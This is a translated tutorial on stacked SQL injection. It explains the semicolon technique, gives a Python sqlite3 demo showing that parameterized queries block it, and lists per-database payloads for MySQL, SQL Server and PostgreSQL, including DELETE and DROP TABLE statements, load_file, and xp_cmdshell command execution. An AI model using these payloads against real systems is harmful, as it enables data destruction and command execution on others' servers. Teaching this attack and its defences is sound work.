Stacked injection--Stack Injection--heap query injection
Original article: http://www.sqlinjection.net/stacked-queries/ . This post is the product of collecting the original author's ideas and combining them with my own thoughts. Stacked injection has more than one Chinese translation: some domestic sources call it heap query injection, others stacked injection. Personally, I think stacked injection is the more accurate name. Stacked injection gives an attacker a number of options: by terminating the current query and appending a new one, they can modify data or invoke stored procedures. This technique is fairly common in SQL injection.
0x01 Introduction to the principle
In SQL, a semicolon (;) marks the end of a statement. So what if, after ending one statement with ;, we continue and construct a second one: will both be executed together? That is the idea behind stacked injection. Union injection also combines two statements, so what is the difference? With UNION or UNION ALL the type of statement that can be appended is limited: it can only be a query. A stacked injection, by contrast, can execute arbitrary statements. For example, with the user input

1; DELETE FROM products

the server-side SQL becomes (because the input parameter is not filtered):

SELECT * FROM products WHERE productid=1; DELETE FROM products

When this is executed, the first statement displays the query result and the second deletes everything in the products table.
0x02 Limitations of stacked injection
The limitation of stacked injection is that it cannot be executed in every environment: it may be restricted by the database API, or the database engine may not support it at all. Insufficient permissions can also explain why an attacker is unable to modify data or invoke certain procedures.
PS: the image here is taken from the original article. My own test environment is PHP+MySQL and stacked queries could be executed there, so I have doubts about the mysql/php entry; presumably the original author's version differs from mine for some reason. Although we said above that stacked queries can execute arbitrary SQL statements, this kind of injection is not perfect. In a web application the code usually returns only one query result, so the second statement of a stacked injection either produces an error or its result is simply ignored, and we cannot see its return value in the front-end interface. Therefore, for reading data, union injection is recommended. We also need to know database information such as table names and column names before using stacked injection.
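The two points above, that stacking depends on the database API rather than only on the SQL text (0x02), and that the fix is to keep input out of the SQL text entirely (0x01), can be shown side by side. The following is an added example written for this post, not code from the original article or from sqlinjection.net. It uses Python's sqlite3 module as a stand-in for the PHP+MySQL environment: executescript() runs every semicolon-separated statement (comparable to a multi-query API), execute() accepts only one statement per call, and a bound parameter is never parsed as SQL. The products table and its rows are constructed for the demo.

```python
import sqlite3

# Constructed demo schema: a tiny products table standing in for the
# application database (sqlite3 is a stand-in for the PHP+MySQL setup).
SCHEMA = """
CREATE TABLE products (productid INTEGER PRIMARY KEY, name TEXT);
INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
"""

# The stacked input from section 0x01.
STACKED_INPUT = "1; DELETE FROM products"


def fresh_db():
    """Return a new in-memory database loaded with the demo rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def count_products(conn):
    """Rows left in products; used to observe whether the DELETE ran."""
    return conn.execute("SELECT COUNT(*) FROM products").fetchone()[0]


def lookup_multi_statement(conn, user_input):
    """Vulnerable: input concatenated into the SQL text AND run through an
    API that executes every ';'-separated statement. Returns the row count
    left in products afterwards (0 when the stacked DELETE ran)."""
    sql = "SELECT * FROM products WHERE productid=" + user_input
    conn.executescript(sql)
    return count_products(conn)


def lookup_single_statement(conn, user_input):
    """Same unsafe concatenation, but execute() accepts only one statement
    per call, so the stacked DELETE is refused before anything runs. This
    is the API limitation from 0x02, not a real fix: a UNION or other
    single-statement injection still works against this code."""
    sql = "SELECT * FROM products WHERE productid=" + user_input
    try:
        conn.execute(sql).fetchall()
        outcome = "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # Older Pythons raise sqlite3.Warning, newer ones ProgrammingError,
        # both with "You can only execute one statement at a time."
        outcome = "rejected"
    return outcome, count_products(conn)


def lookup_parameterized(conn, user_input):
    """The actual fix: the input is bound as a value, never parsed as SQL.
    The whole string is compared against productid and matches nothing."""
    rows = conn.execute(
        "SELECT * FROM products WHERE productid=?", (user_input,)
    ).fetchall()
    return rows, count_products(conn)


if __name__ == "__main__":
    print("multi-statement API, rows left:",
          lookup_multi_statement(fresh_db(), STACKED_INPUT))
    print("single-statement API:",
          lookup_single_statement(fresh_db(), STACKED_INPUT))
    print("parameterized:",
          lookup_parameterized(fresh_db(), STACKED_INPUT))
```

The middle function is the interesting one for this section: the same vulnerable code either empties the table or is harmless depending only on which driver call it goes through, which is exactly why the support table in the original article lists some language/database pairs as not stackable. Only the last function is safe against injection in general.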
0x03 Examples for individual databases
In this section we go through several databases from the perspective of the common database operations: insert, delete, select and update. The basic stacked-injection operations for each database are listed below.
- One. MySQL
  - 1. Create a new table: select * from users where id=1;create table test like users;
    After successful execution, check whether the new test table was created.
  - 2. Delete the test table created above: select * from users where id=1;drop table test;
  - 3. Query data: select * from users where id=1;select;
    Load a file: select * from users where id=1;select load_file('c:/tmpupbbn.php');
  - 4. Modify data: select * from users where id=1;insert into users (id,username,password) values ('+','new','new');
- Two. SQL Server
  - 1. Add a table: select * from test;create table sc3 (ss char(8));
  - 2. Delete a table: select * from test;drop table sc3;
  - 3. Query data: select 1,2,3;select * from test;
  - 4. Modify data: select * from test;update test set name='test' where id=3;
  - 5. Execute a stored procedure, the most important case in SQL Server: select * from test where id=1;exec master..xp_cmdshell 'ipconfig'
- Three. Oracle
  As mentioned in the introduction above, Oracle cannot be used for stacked injection: when two statements are placed on the same line it errors out immediately with "invalid character". We will not try further here.
- Four. PostgreSQL
  - 1. Create a new table: select * from user_test;create table user_data (id date);
    You can see that the user_data table has been created.
  - 2. Delete the user_data table created above: select * from user_test;delete from user_data;
  - 3. Query data: select * from user_test;select;
  - 4. Modify data: select * from user_test;update user_test set name='modify' where name='Zhang San';